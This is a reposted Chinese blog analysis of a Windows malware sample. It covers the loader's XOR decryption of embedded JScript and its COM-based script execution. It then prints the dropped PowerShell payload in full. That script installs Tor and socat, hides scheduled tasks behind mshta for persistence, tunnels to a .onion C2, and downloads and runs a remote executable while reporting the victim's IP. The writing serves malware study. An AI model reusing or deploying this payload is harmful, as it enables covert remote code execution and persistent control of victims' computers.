转载

调用jscript引擎接口的malware分析

int __cdecl main(int argc, const char argv, const char envp)

{
JSEngine v3 ; //

ST20_4

JSEngine v4 ; //

ST18_4

unsigned int i ; //

[esp+1Ch] [ebp-14h]

encry_code *a2 ; //

[esp+20h] [ebp-10h]

FreeConsole

();

a2 = operator new ( 8u

);

a2 ->size = 0x14C88

;

a2 ->js_code = operator new[] ( a2

->size);

for ( i = 0 ; i < a2 ->size; ++ i

)

a2 ->js_code[ i ] = encrypt_code [ i

];

decrypt_code ( a2 ->js_code, a2 ->size - 1

);

v3 = operator new ( 0x10u

);

memset ( v3 , 0x10u

);

v4 = init_com ( v3

);

run_jscript ( v4 , a2

);

sub_862F90 ( v4

);

return 0

;

}

jscript代码解密

解密方式也比较简单,主要就是通过xor来解密

_BYTE __cdecl decrypt_code(char a1, unsigned int size)

{
_BYTE v2 ; //

edx

_BYTE result ; //

eax

unsigned int v4 ; //

[esp+0h] [ebp-1Ch]

_BYTE v5 ; //

[esp+10h] [ebp-Ch]

unsigned int i ; //

[esp+14h] [ebp-8h]

unsigned int j ; //

[esp+18h] [ebp-4h]

= 0x7FFFFFFF - 8 fun ( size , 6

);

result = operator new ( 1u

);

v5 = result

;

v2 = result

;

LOBYTE ( result ) = 4 ; v2 = 4

;

// 生成xor key

for ( i = 0 ; i < 4 ; ++ i

)

{

v5 [ i ] = v4 >> 8 * i

;

result = ( i + 1

);

}

for ( j = 0 ; j < size ; ++ j

)

{

result = ( v5 [ j % 4 ] ^ a1 [ j

]);

a1 [ j ] = result

;

}

return result

;

}

com调用jscript代码

1.  CoCreateInstance()创建javascript的引擎,获得jscript引擎的接口的IActiveScript 
      2.  实现回调调用接口IActiveScriptSite,通过IActiveScript->SetScriptSite()交给脚本回调
      3.  IActiveScript->QueryInterface()取得IActiveScriptParse接口,IActiveScriptParse接口用来解析执行jscript脚本

脚本行为

脚本会释放出一个powershell脚本,可能是c2c连接已经失效,后续的行为没跑出来

$SH_TYPE_SCHEDULED_TASK=1;
$SH_TYPE_TASK_SCHEDULER=2;
$schedulerType=$SH_TYPE_SCHEDULED_TASK;
function FVRClsggMRAZ
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}
}
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function RandomString{
    param([int]$min=5, [int]$max=15);
    return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
}
function InitScheduller{
    try{
        Import-Module ScheduledTasks -ErrorAction Stop;
        return $SH_TYPE_SCHEDULED_TASK;
    }catch{
        $File=$env:Temp+'/'+(RandomString)+'.zip';
        $Dest=$env:Temp+'/'+(RandomString);
        while (!(iGgRLcyIJQBzrA 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
        if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
        FVRClsggMRAZ $File $Dest;
        Remove-Item -Force $File;
        $TSAssembly=$Dest+'/lib/net20/Microsoft.Win32.TaskScheduler.dll';
        $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
        return $SH_TYPE_TASK_SCHEDULER;
    }
}
function xrnOlrj
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
switch ($schedulerType) {
    $SH_TYPE_SCHEDULED_TASK {
        $Action = New-ScheduledTaskAction -Execute $cmd;
        if(-Not [String]::IsNullOrEmpty($params)){
            $Action.Arguments=$params;
        }
        if(-Not [String]::IsNullOrEmpty($dir)){
            $Action.WorkingDirectory=$dir;
        }
        $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
        try{
            $LogonTrigger.UserId=$env:username;
        }catch{
            $LogonTrigger.User=$env:username;
        }
        if(-Not $delay -eq 0){
            $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
        }
        if($restart -eq 1){
            $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
        }
        $Settings = New-ScheduledTaskSettingsSet;
        $Settings.DisallowStartIfOnBatteries = $False;
        $Settings.StopIfGoingOnBatteries = $False;
        if($restart -eq 1){
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }else{
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }
        Start-ScheduledTask -InputObject $Task;
    };
    Default {
        $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
        $td=$ts.NewTask();
        $td.RegistrationInfo.Description = (RandomString);
        $td.Settings.DisallowStartIfOnBatteries = $False;
        $td.Settings.StopIfGoingOnBatteries = $False;
        $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
        $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
        $LogonTrigger.StartBoundary=[System.DateTime]::Now;
        $LogonTrigger.UserId=$env:username;
        $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
        $td.Triggers.Add($LogonTrigger);
        if($restart -eq 1){
        $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
        $TimeTrigger.StartBoundary=[System.DateTime]::Now;
        $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
        $TimeTrigger.Repetition.StopAtDurationEnd=$False;
        $td.Triggers.Add($TimeTrigger);
        }
        $tsf="Microsoft.Win32.TaskScheduler";
        $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
        $td.Actions.Add($ExecAction);
        $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
        $task.Run();
    };
}
}
function iGgRLcyIJQBzrA {
    param([string]$AETLcnitKnaNqr, [string]$aEntsBMtsayB);
    $ErrorActionPreference = "Stop";
    Write-Host ("Download {0} to {1}" -f ($AETLcnitKnaNqr, $aEntsBMtsayB));
    try {
        Start-BitsTransfer -Source $AETLcnitKnaNqr -Destination $aEntsBMtsayB;
    }
    catch {
        #Write-Error $_ -ErrorAction Continue;
        try {
            (New-Object System.Net.WebClient).DownloadFile($AETLcnitKnaNqr,$aEntsBMtsayB);
        }
        catch {
            #Write-Error $_ -ErrorAction Continue;
            Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$AETLcnitKnaNqr`" `"$aEntsBMtsayB`"" -Wait -WindowStyle Hidden;
        }
    }finally{
        $ErrorActionPreference = "Continue";
    }
    if ( $(Try { Test-Path $aEntsBMtsayB.trim() } Catch { $false })){
        return $true;
    }
    return $false;
}
function IwoPMc{
$schedulerType = InitScheduller;
$tf=$env:Temp+'/'+(RandomString)+'.zip';
$DestTP=$env:ALLUSERSPROFILE+'/'+(RandomString);
$TorMirrors=@("https://dist.torproject.org/",
"https://torproject.mirror.metalgamer.eu/dist/",
"https://tor.ybti.net/dist/");
foreach ($mirror in $TorMirrors) {
    $_url=$mirror+'torbrowser/7.0.11/tor-win32-0.3.1.9.zip';
    if((iGgRLcyIJQBzrA $_url $tf)){
        break;
    }
}
if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null;
FVRClsggMRAZ $tf $DestTP;
Remove-Item -Force $tf;
$ykF=$DestTP+'/Tor/';
$WqPfv="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $WqPfv 0 0 $ykF;
$SFile=$env:Temp+'/'+(RandomString)+'.zip';
while (!(iGgRLcyIJQBzrA 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $SFile)){}
FVRClsggMRAZ $SFile $DestTP;
$s_old=$DestTP+'/socat-windows-1.7.2.1/';
$s_new=(RandomString);
Remove-Item -Force $SFile;
Rename-Item -path $s_old -newName $s_new;
$dLkdOdvs=$DestTP+'/'+$s_new+'/';
$s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:80,socksport=9050';
$s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:5588,socksport=9050';
$SyASxV="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
$CkeHaEMoQb="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $SyASxV 0 0 $dLkdOdvs;
xrnOlrj (RandomString) 'mshta.exe' $CkeHaEMoQb 0 0 $dLkdOdvs;
$wXdRbCFwn="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'//"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $wXdRbCFwn 1;
}
IwoPMc;

纯属好玩

调用jscript引擎接口的malware分析

扫码打赏,你说多少就多少

调用jscript引擎接口的malware分析
调用jscript引擎接口的malware分析

打开 支付宝 扫一扫,即可进行扫码打赏哦

原文  http://shxi.me/posts/6193d55c.html
正文到此结束
Loading...